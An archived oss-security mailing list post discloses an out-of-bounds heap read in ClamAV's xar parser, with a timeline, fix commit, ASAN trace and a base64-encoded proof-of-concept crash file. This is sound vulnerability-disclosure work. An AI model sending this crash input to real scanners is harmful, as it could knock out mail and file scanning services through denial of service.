Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Fri, 29 Sep 2017 15:09:22 +0200
From: Hanno Böck <hanno@...eck.de>
To: oss-security@...ts.openwall.com
Subject: clamav: Out of bounds read and segfault in xar parser

Hi,

A malformed xar file can cause an out of bounds heap read in clamav (as
usual detectable with asan). If run against a non-asan build clamscan
will still segfault in my tests. Found with afl.

The bug happens in the function xar_hash_check. Despite it being
reported more than a year ago there's still no release with the fix
(however it's been fixed in git).

I fuzzed clamav according to the instructions in this blog post:
https://foxglovesecurity.com/2016/06/13/finding-pearls-fuzzing-clamav/

Upstream fix:
https://github.com/vrtadmin/clamav-devel/commit/d96a6b8bcc7439fa7e3876207aa0a8e79c8451b6

Upstream bug (not public):
https://bugzilla.clamav.net/show_bug.cgi?id=11588

Timeline:
2016-06-15 reported bug
2016-06-21 fix in git
2017-09-29 public disclosure due to lack of upstream action

base64-encoded poc (didn't want to send it as an attachment due to
fear of crashing people's mail scanners. On the other hand I'm sure
there are mail scanners that'll try to decode the base64...):
eGFyIQAcMDAAAAAAAAABMAAAAAAAMDAwMDAwMHjafFPLcpwwELzvV1DcZT14LqWVKxdX7nEuuQ1i
WFThVaC11/76CAHecrbsE61Wq6dHjOTjtWuDF5xmM/SnkD+wMMBeD5Xpz6fw9/MTycNHdZBXmNQh
kHbQ7hMwPSFYd4Iw06ESMCcwMMKyMM4LnhUwMPpZ4g81qP/Oly6Y7VuLpzBugIfLTiCHup7RKjDp
hjw7m/fFXDAPFgu6e/gwMDAMTOVibzYVWPAokC32Z9soMEm6wZXf/MXnMFut+FbKUfs97HlhHFuj
fVP0Ss7vZgzpJoVJN+YFK/J/j79+/nDhMAiqMDAwMDCvdTCOSTAwMBcsyuAwMDAwhJcwMDDeGe1Z
rnYCbb+sUNW1yDAC2X0jMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDA=


Meta-level comment:
It seems to me clamav development has mostly stalled. Detection rates
are very low and I'm considering to stop using it for mail filtering.
(also there's of course the whole AV debate, however I never saw
clamav as a security tool, more as something like a spam filter that
prevents crap in my inbox. Still of course it needs to have secure
parsers.)



ASAN error:

==17489==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000504790 at pc 0x7f83622125d4 bp 0x7ffcee86b840 sp 0x7ffcee86b830
READ of size 20 at 0x602000504790 thread T0
    #0 0x7f83622125d3 in xar_hash_check /var/tmp/portage/app-antivirus/clamav-0.99.2/work/clamav-0.99.2/libclamav/xar.c:399
    #1 0x7f83622125d3 in cli_scanxar /var/tmp/portage/app-antivirus/clamav-0.99.2/work/clamav-0.99.2/libclamav/xar.c:818
    #2 0x7f8362053706 in magic_scandesc /var/tmp/portage/app-antivirus/clamav-0.99.2/work/clamav-0.99.2/libclamav/scanners.c:3162
    #3 0x7f8362057376 in cli_base_scandesc /var/tmp/portage/app-antivirus/clamav-0.99.2/work/clamav-0.99.2/libclamav/scanners.c:3351
    #4 0x7f8362058a65 in scan_common /var/tmp/portage/app-antivirus/clamav-0.99.2/work/clamav-0.99.2/libclamav/scanners.c:3590
    #5 0x7f8362058d1a in scan_common /var/tmp/portage/app-antivirus/clamav-0.99.2/work/clamav-0.99.2/libclamav/scanners.c:3534
    #6 0x7f8362058d1a in cl_scandesc_callback /var/tmp/portage/app-antivirus/clamav-0.99.2/work/clamav-0.99.2/libclamav/scanners.c:3706
    #7 0x40e41f in scanfile /var/tmp/portage/app-antivirus/clamav-0.99.2/work/clamav-0.99.2/clamscan/manager.c:392
    #8 0x4126a3 in scanmanager /var/tmp/portage/app-antivirus/clamav-0.99.2/work/clamav-0.99.2/clamscan/manager.c:1204
    #9 0x403971 in main /var/tmp/portage/app-antivirus/clamav-0.99.2/work/clamav-0.99.2/clamscan/clamscan.c:161
    #10 0x7f83616f478f in __libc_start_main (/lib64/libc.so.6+0x2078f)
    #11 0x403fb8 in _start (/usr/bin/clamscan+0x403fb8)

-- 
Hanno Böck
https://hboeck.de/

mail/jabber: hanno@...eck.de
GPG: FE73757FA60E4E21B937579FA5880072BBB51E42

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.